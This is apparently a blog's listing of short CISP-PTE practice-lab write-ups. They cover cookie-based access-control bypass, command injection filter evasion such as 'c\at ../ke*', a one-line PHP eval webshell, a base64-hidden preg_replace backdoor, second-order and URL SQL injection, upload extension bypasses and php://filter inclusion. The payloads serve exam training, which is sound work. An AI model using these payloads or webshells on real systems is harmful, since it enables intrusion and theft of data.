
cisp-pte
HacKing~
这个作者很懒,什么都没留下…
展开
-
练习题目五:失效的访问控制
练习题目五:失效的访问控制点击开始答题,查看我们的请求包。发现cookie 有俩参数 一个是 is admin = false 等于为假username = R3Vlc3Q%3D %3D 是一个 url编码 =符合,前面base64 加密 解密出来username = Guest 来宾用户这里我们把 false 改成 tuerR3Vlc3Q%3D 改成 YWRtaW4%3D发现还是提示, 只允许本地用户访问我们把我们请求原创 2021-07-31 00:24:44 · 1993 阅读 · 1 评论 -
基础题目五:命令执行
基础题目五:命令执行发现过滤 cat |&符没过滤127.0.0.1& 能执行127.0.0.1&cat ../key.php发现还是不行。那就是过滤了cat使用\127.0.0.1&c\at ../key.php还是不行,过滤了key使用通配符127.0.0.1&c\at ../ke*通配符通配符是一种特殊语句,主要有星号(*)和问号(?),用来模糊搜索文件。当查原创 2021-07-31 00:23:47 · 1349 阅读 · 0 评论 -
基础题目四:代码审计
访问 121212.htmlecho '<?php' > fecho 'eval($_POST["x"]);' > fmv f f.php原创 2021-07-31 00:23:09 · 1451 阅读 · 0 评论 -
基础题目三:文件包含
出来一个 Are you ok ?访问view.html查看源码<?php @$a = $_POST['Hello']; if(isset($a)){ @preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); } ?>base64 解密出来等于 = [@eval(base64_decode($_POST[...原创 2021-07-31 00:22:09 · 2142 阅读 · 0 评论 -
基础题目一:二阶SQL注入
基础题目一:二阶SQL注入解题思路,利用修改密码,改掉admin的密码。注释符注册用户 admin"-- 登陆后,修改密码。退出使用修改的密码登陆admin 失败,过滤了。使用 admin'# 注册登陆修改密码,使用admin登陆...原创 2021-07-31 00:21:36 · 957 阅读 · 0 评论 -
基础题目之日志分析
通过下载日志,已知线索ip:172.16.12.12利用Notepad++正则 匹配到 我们知道的ip地址 已经状态码 200 的172.16.12.12 .*".*" 200发现攻击者一直在adminlogin.php 页面请求。发现是个登陆框。导入字典爆破密码为password123...原创 2021-07-31 00:21:05 · 802 阅读 · 0 评论 -
基础题目之命令执行
Linux 下的分隔符;|||&&&通过执行命令,发现 | 可用 并且cat被禁用无法查看key.php使用127.0.0.1|grep ''../key.php //这里是2个‘’ 符号。原创 2021-07-31 00:20:21 · 731 阅读 · 0 评论 -
基础题目之文件上传突破
基础题目之文件上传突破此处过滤,文件类型php,文件头,php后缀有php php3 php5 php7 pht phtml原创 2021-07-31 00:19:45 · 1555 阅读 · 0 评论 -
基础题目之文件包含
跟之前的一样或者使用PHP伪协议php://filter/read=convert.base64-encode/resource=../key.php原创 2021-07-31 00:19:15 · 1162 阅读 · 1 评论 -
基础题目之SQL注入
http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')--%20这样执行一个结果,你会发现-- 没有起到注释的作用说明这个地方不能使用空格http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')# //#经过url编码变成%23http://11.1.10.27:34041/vulnerabilities/fu1.php?id=1')%23发现返回原创 2021-07-31 00:17:58 · 1923 阅读 · 0 评论